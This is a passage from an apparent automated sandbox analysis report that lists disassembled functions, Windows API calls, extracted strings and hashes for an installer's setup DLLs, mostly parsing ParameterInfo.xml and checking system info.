                                                                                                                                                                    control_flow_graph 2338 69db0c91-69db0cb5 call 69dd6e8d GetModuleHandleW 2341 69db0cea-69db0cfb 2338->2341 2342 69db0cb7-69db0ce5 call 69da833e GetLastError call 69db1236 2338->2342 2347 69db0cfd 2341->2347 2348 69db0d03-69db0db0 GetNativeSystemInfo call 69d74e07 call 69d7c5d4 call 69dc8f0e call 69da833e call 69db1236 call 69dc8f0e call 69d74fd5 2341->2348 2351 69db1007-69db1014 call 69dc8f0e call 69dd6f1f 2342->2351 2347->2348 2370 69db0dca 2348->2370 2371 69db0db2-69db0dba GetLastError 2348->2371 2374 69db0dcc-69db0e13 call 69da833e call 69db1236 call 69dc8f0e call 69d74fac 2370->2374 2372 69db0dbc-69db0dc1 2371->2372 2373 69db0dc6-69db0dc8 2371->2373 2372->2373 2373->2374 2383 69db0e19 2374->2383 2384 69db0e15-69db0e17 2374->2384 2385 69db0e20-69db0e36 2383->2385 2384->2385 2387 69db0e38-69db0e40 GetLastError 2385->2387 2388 69db0e50 2385->2388 2390 69db0e4c-69db0e4e 2387->2390 2391 69db0e42-69db0e47 2387->2391 2389 69db0e52-69db0e9d call 69da833e call 69db1236 call 69dc8f0e 2388->2389 2400 69db0e9f-69db0ea7 GetLastError 2389->2400 2401 69db0eb7 2389->2401 2390->2389 2391->2390 2403 69db0ea9-69db0eae 2400->2403 2404 69db0eb3-69db0eb5 2400->2404 2402 69db0eb9-69db0f5d call 69da833e call 69db1236 call 69dc8f0e call 69dce770 call 69d74fac call 69d75727 call 69db356c 2401->2402 2420 69db0f5f-69db0f67 GetLastError 2402->2420 2421 69db0f77 2402->2421 2403->2404 2404->2402 2422 69db0f69-69db0f6e 2420->2422 2423 69db0f73-69db0f75 2420->2423 2424 69db0f79-69db0fb4 call 69da833e call 69db1236 call 69dc8f0e call 69d7712b 2421->2424 2422->2423 2423->2424 2432 69db0fb9-69db1001 call 69d7c5d4 call 69dc8f0e call 69da833e call 69db1236 2424->2432 2432->2351
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DB0C9B
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0000029C,69DAA587,?,69D6A794,?,02602230,?,00000000,?,Failed to record current state name), ref: 69DB0CAD
                                                                                                                                                                    • GetLastError.KERNEL32(?,Failed to record OSFullBuildNumber), ref: 69DB0CCC
                                                                                                                                                                      • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?), ref: 69DB0D21
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 69DB0DB2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,Failed to record OSAbbr,?,00000000,?,Failed to record OSFullBuildNumber,000001C5,00000000), ref: 69DB0E38
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$H_prolog3$H_prolog3_HandleInfoModuleNativeSystem
                                                                                                                                                                    • String ID: Failed to record OSAbbr$Failed to record OSComplete$Failed to record OSFullBuildNumber$Failed to record OsSpLevel$Failed to record SystemLocale$Failed to record WindowsInstallerVersion$GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                    • API String ID: 684166175-3561000745
                                                                                                                                                                    • Opcode ID: 8aef7511046273973b0bdd8d9ddcf02100e934c1720d73fee420b35ed42e2d68
                                                                                                                                                                    • Instruction ID: 0fbb651796302381324c91a51e2ebea9fe20249d8ba176eacb3e2bf36fab8970
                                                                                                                                                                    • Opcode Fuzzy Hash: 8aef7511046273973b0bdd8d9ddcf02100e934c1720d73fee420b35ed42e2d68
                                                                                                                                                                    • Instruction Fuzzy Hash: B4A1E675900259EFDB20DBB4CE09B8DB7B9AF45308F1085F4E405EB694DB74EA888B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698ED149 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 114windowCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698ED150
                                                                                                                                                                      • Part of subcall function 698DC419: __EH_prolog3.LIBCMT ref: 698DC420
                                                                                                                                                                      • Part of subcall function 698DC419: GetModuleFileNameW.KERNEL32(698D0000,00000010,00000104), ref: 698DC46D
                                                                                                                                                                      • Part of subcall function 698EF21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,698DC3AE), ref: 698EF241
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED198
                                                                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 698ED1AF
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000020,00000020,00000010), ref: 698ED1E4
                                                                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 698ED1F5
                                                                                                                                                                    • SendMessageW.USER32(00000000,00000170,?,00000000), ref: 698ED209
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED231
                                                                                                                                                                    • GetDlgItem.USER32(?,00000069), ref: 698ED242
                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 698ED256
                                                                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 698ED27E
                                                                                                                                                                    • GetDlgItem.USER32(?,0000006A), ref: 698ED28F
                                                                                                                                                                    • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 698ED2A3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ImageLoadMessageSend$Item$H_prolog3$AppendFileModuleNamePath
                                                                                                                                                                    • String ID: graphics\setup.ico$print.ico$save.ico$stop.ico$warn.ico
                                                                                                                                                                    • API String ID: 1194837009-3827646805
                                                                                                                                                                    • Opcode ID: 63ddbb1d70950aa09d37f7b0aafd4224159d622538a404fcab47aec794bdbd66
                                                                                                                                                                    • Instruction ID: c853340680e707d1fcae1c779069940d8ef352f115b6ab5c8a8fe269990a1064
                                                                                                                                                                    • Opcode Fuzzy Hash: 63ddbb1d70950aa09d37f7b0aafd4224159d622538a404fcab47aec794bdbd66
                                                                                                                                                                    • Instruction Fuzzy Hash: 77415434640709AFEF209BA4CC56FAAB7A9BF56704F404C19F265EA0D0CBB2E418DB10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D887B0 Relevance: 28.6, APIs: 2, Strings: 14, Instructions: 565COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D887B7
                                                                                                                                                                      • Part of subcall function 69D81D3D: __EH_prolog3.LIBCMT ref: 69D81D44
                                                                                                                                                                      • Part of subcall function 69D81D3D: __CxxThrowException@8.LIBCMT ref: 69D81E11
                                                                                                                                                                      • Part of subcall function 69D795C1: __EH_prolog3.LIBCMT ref: 69D795C8
                                                                                                                                                                      • Part of subcall function 69D795C1: VariantInit.OLEAUT32(?), ref: 69D795DB
                                                                                                                                                                      • Part of subcall function 69D795C1: SysFreeString.OLEAUT32(?), ref: 69D7960E
                                                                                                                                                                      • Part of subcall function 69D795C1: VariantClear.OLEAUT32(00000008), ref: 69D7962E
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D88D0A
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8ThrowVariant$ClearDispatcherExceptionFreeInitStringUser
                                                                                                                                                                    • String ID: 1$ActionTable$ApplicableIf$Compressed$Compressed items need to have URL and CompressedDownloadSize authored.$CustomErrorHandling$Exe$InstallCommandLine$IsPresent$LogFileHint$ParameterInfo.xml$RepairCommandLine$UninstallCommandLine$schema validation failure: wrong number of EXE child nodes!
                                                                                                                                                                    • API String ID: 1022868530-2895508641
                                                                                                                                                                    • Opcode ID: b9458fe3fc7d0f14cfd2105f8e2507859ce1fe50d5017de1c772f4a01c60ff9f
                                                                                                                                                                    • Instruction ID: 2ba2029dc016f4009bb5fdcda63704e894c8be5ea8c55fa015184db562994455
                                                                                                                                                                    • Opcode Fuzzy Hash: b9458fe3fc7d0f14cfd2105f8e2507859ce1fe50d5017de1c772f4a01c60ff9f
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B321B75A00249EFDF04DFA8C944A9EBBB9BF09314F148169F825EB791C734EA05CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB9D05 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 311COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69D739AD: __EH_prolog3.LIBCMT ref: 69D739B4
                                                                                                                                                                    • GetCommandLineW.KERNEL32(F0D05EFD,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 69DB9D54
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69DB9EBD
                                                                                                                                                                    Strings
                                                                                                                                                                    • SetupVersion specified in ParameterInfo.xml is , xrefs: 69DBA029
                                                                                                                                                                    • SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version., xrefs: 69DB9F44
                                                                                                                                                                    • higher, xrefs: 69DBA001, 69DBA017
                                                                                                                                                                    • SetupVersion not specified, xrefs: 69DB9E1F
                                                                                                                                                                    • Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check., xrefs: 69DB9D95
                                                                                                                                                                    • SetupVersion specified in ParameterInfo.xml is '%s', xrefs: 69DB9EC3
                                                                                                                                                                    • SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version., xrefs: 69DB9F58
                                                                                                                                                                    • 1.0, xrefs: 69DB9D3D, 69DB9D42, 69DB9ED4, 69DB9EFB
                                                                                                                                                                    • NoSetupVersionCheck, xrefs: 69DB9D6C
                                                                                                                                                                    • SetupVersion, xrefs: 69DB9DC0
                                                                                                                                                                    • Current SetupVersion = %s, xrefs: 69DB9D43
                                                                                                                                                                    • lower, xrefs: 69DB9FFA
                                                                                                                                                                    • than the currently supported version., xrefs: 69DBA006
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69DB9E2E, 69DB9F67, 69DBA096
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandException@8LineThrow
                                                                                                                                                                    • String ID: than the currently supported version.$1.0$Command line switch 'NoSetupVersionCheck' found - so not performing SetupVersion check.$Current SetupVersion = %s$NoSetupVersionCheck$ParameterInfo.xml$SetupVersion$SetupVersion not specified$SetupVersion specified in ParameterInfo.xml has a minor version greater than the currently supported version.$SetupVersion specified in ParameterInfo.xml has a minor version lower than the currently supported version.$SetupVersion specified in ParameterInfo.xml is $SetupVersion specified in ParameterInfo.xml is '%s'$higher$lower
                                                                                                                                                                    • API String ID: 1129948358-1674238012
                                                                                                                                                                    • Opcode ID: 20c37f6a2bbc9ea0cc8e56d120663037ceeca5d00b89f95fb153df9438d9551d
                                                                                                                                                                    • Instruction ID: fbba8338d82de48e0dc961fc133241b61e3a9d602a34e4ab74626831be3c0f1a
                                                                                                                                                                    • Opcode Fuzzy Hash: 20c37f6a2bbc9ea0cc8e56d120663037ceeca5d00b89f95fb153df9438d9551d
                                                                                                                                                                    • Instruction Fuzzy Hash: C8C140765087809FD710DB68C880F5EB7E8AF95318F548A2CF1A1C76A1DB34D949CB63
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D89847 Relevance: 26.9, APIs: 2, Strings: 13, Instructions: 646COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D89851
                                                                                                                                                                      • Part of subcall function 69DCC0AA: _malloc.LIBCMT ref: 69DCC0C4
                                                                                                                                                                      • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC0F9
                                                                                                                                                                      • Part of subcall function 69DCC0AA: std::exception::exception.LIBCMT ref: 69DCC113
                                                                                                                                                                      • Part of subcall function 69DCC0AA: __CxxThrowException@8.LIBCMT ref: 69DCC124
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D78AAC: __EH_prolog3.LIBCMT ref: 69D78AB3
                                                                                                                                                                      • Part of subcall function 69D78AAC: __CxxThrowException@8.LIBCMT ref: 69D78B39
                                                                                                                                                                      • Part of subcall function 69D78D44: __EH_prolog3.LIBCMT ref: 69D78D4B
                                                                                                                                                                      • Part of subcall function 69D8784C: __EH_prolog3.LIBCMT ref: 69D87853
                                                                                                                                                                      • Part of subcall function 69D78D44: __CxxThrowException@8.LIBCMT ref: 69D78EFD
                                                                                                                                                                      • Part of subcall function 69D81D3D: __EH_prolog3.LIBCMT ref: 69D81D44
                                                                                                                                                                      • Part of subcall function 69D81D3D: __CxxThrowException@8.LIBCMT ref: 69D81E11
                                                                                                                                                                      • Part of subcall function 69D81C2E: __EH_prolog3.LIBCMT ref: 69D81C35
                                                                                                                                                                      • Part of subcall function 69D81C2E: __CxxThrowException@8.LIBCMT ref: 69D81D02
                                                                                                                                                                      • Part of subcall function 69DA8CD5: __EH_prolog3.LIBCMT ref: 69DA8CDC
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D8A060
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                      • Part of subcall function 69D78329: __EH_prolog3.LIBCMT ref: 69D78330
                                                                                                                                                                      • Part of subcall function 69D7A3BC: __EH_prolog3.LIBCMT ref: 69D7A3C3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw$std::exception::exception$DispatcherExceptionUser_malloc
                                                                                                                                                                    • String ID: $<$A helper with this name already exists. All helper names must be unique. : $ActionTable$ApplicableIf$Cannot create the helper item: $CommandLine$InstalledProductSize$IsPresent$Name$ParameterInfo.xml$Patches$SystemDriveSize
                                                                                                                                                                    • API String ID: 2177076360-1307745120
                                                                                                                                                                    • Opcode ID: 74ad59147e9ce358c26f874d72d360f2982609dffce23693076c5ecef6088ebb
                                                                                                                                                                    • Instruction ID: bb15140973fa40ce73eed24d483b2f999ed713dd567eb7ea4002b995e056ae63
                                                                                                                                                                    • Opcode Fuzzy Hash: 74ad59147e9ce358c26f874d72d360f2982609dffce23693076c5ecef6088ebb
                                                                                                                                                                    • Instruction Fuzzy Hash: F5523BB1901249DFDB01CFE4CA44BEEBBB8BF09318F108169E554BB691D7749A05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D8293D Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 416COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D82944
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D82677: __EH_prolog3.LIBCMT ref: 69D8267E
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                      • Part of subcall function 69D7A378: __EH_prolog3.LIBCMT ref: 69D7A37F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D82C00
                                                                                                                                                                      • Part of subcall function 69DD14AA: KiUserExceptionDispatcher.NTDLL(?,?,69DCC129,00000C00,?,?,?,?,69DCC129,00000C00,69DEBA3C,69E076D4,00000C00,00000020,69DAF845,?), ref: 69DD14EC
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                                                                                                                                    • String ID: 8$Blockers$ParameterInfo.xml$StopBlockers$SuccessBlockers$WarnBlockers$schema validation failure: More than 1 Stop Block defined.$schema validation failure: More than 1 Success Block defined.$schema validation failure: More than 1 Warning Block defined.$schema validation failure: Stop blockers has no child node$schema validation failure: Success blockers has no child node$schema validation failure: Warn blockers has no child node$schema validation failure: no valid child element found for 'Blockers' node.
                                                                                                                                                                    • API String ID: 3417717588-4180151753
                                                                                                                                                                    • Opcode ID: 0827ab47f6669a479d802204dd73726572148bf19e249ef2e51e5a3cb27482d4
                                                                                                                                                                    • Instruction ID: 0ab8ef556cfa58af987971e878f4bb792da603648aa19e76a645038cc2fe087c
                                                                                                                                                                    • Opcode Fuzzy Hash: 0827ab47f6669a479d802204dd73726572148bf19e249ef2e51e5a3cb27482d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF18071900289EBCF04DBE8C944ADE7BB8AF19358F14C169F515EBA81DB34DA05CB72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A72C9B Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 295memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,69A727B0,00000000,69A90088), ref: 69A72D01
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,69A727B0,00000000,69A90088), ref: 69A72D4F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID: Local\SqmData_%s
                                                                                                                                                                    • API String ID: 4275171209-1264235261
                                                                                                                                                                    • Opcode ID: 8e54ea624b17bad83e82ea8625d515dd2a723ce6b4cc9334c073622562723359
                                                                                                                                                                    • Instruction ID: 43194a005fd0ea3b4aa1bd8846a7f2a1a9311ffc453aad5a946440bf1f276d44
                                                                                                                                                                    • Opcode Fuzzy Hash: 8e54ea624b17bad83e82ea8625d515dd2a723ce6b4cc9334c073622562723359
                                                                                                                                                                    • Instruction Fuzzy Hash: 80B1C275550340AFD7A48F24CE46F663BE9FB01B88F1480A8E9A9DE5A1DB71D8C6CF40
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7BB3C Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 260COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D7BB43
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D7BDEB
                                                                                                                                                                    Strings
                                                                                                                                                                    • schema validation failure: there must be a valid child element for Configuration., xrefs: 69D7BD5C
                                                                                                                                                                    • DownloadInstallSetting, xrefs: 69D7BC4B
                                                                                                                                                                    • BlockingMutex, xrefs: 69D7BC9D
                                                                                                                                                                    • FilesInUseSetting, xrefs: 69D7BCEF
                                                                                                                                                                    • UserExperienceDataCollection, xrefs: 69D7BBF8
                                                                                                                                                                    • Using Simultaneous Download and Install mechanism, xrefs: 69D7BE01
                                                                                                                                                                    • Using Serial Download and Install mechanism, xrefs: 69D7BDFA
                                                                                                                                                                    • AdditionalCommandLineSwitches, xrefs: 69D7BBA6
                                                                                                                                                                    • DisabledCommandLineSwitches, xrefs: 69D7BB52
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D7BD6A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: AdditionalCommandLineSwitches$BlockingMutex$DisabledCommandLineSwitches$DownloadInstallSetting$FilesInUseSetting$ParameterInfo.xml$UserExperienceDataCollection$Using Serial Download and Install mechanism$Using Simultaneous Download and Install mechanism$schema validation failure: there must be a valid child element for Configuration.
                                                                                                                                                                    • API String ID: 2489616738-904804324
                                                                                                                                                                    • Opcode ID: 911ff7b252f2c2835879cf6cc998c1542401b4bedc12de8312374f1ea106a4c8
                                                                                                                                                                    • Instruction ID: 8fb6a15fb71642265df1c86923072daa6b5bd5d3285490d07852929b52e02fbb
                                                                                                                                                                    • Opcode Fuzzy Hash: 911ff7b252f2c2835879cf6cc998c1542401b4bedc12de8312374f1ea106a4c8
                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA12E75900249EFDB10DFA8C945AAEBBB9BF09314F148165F815EB780C734DA14CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F6525 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 199comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
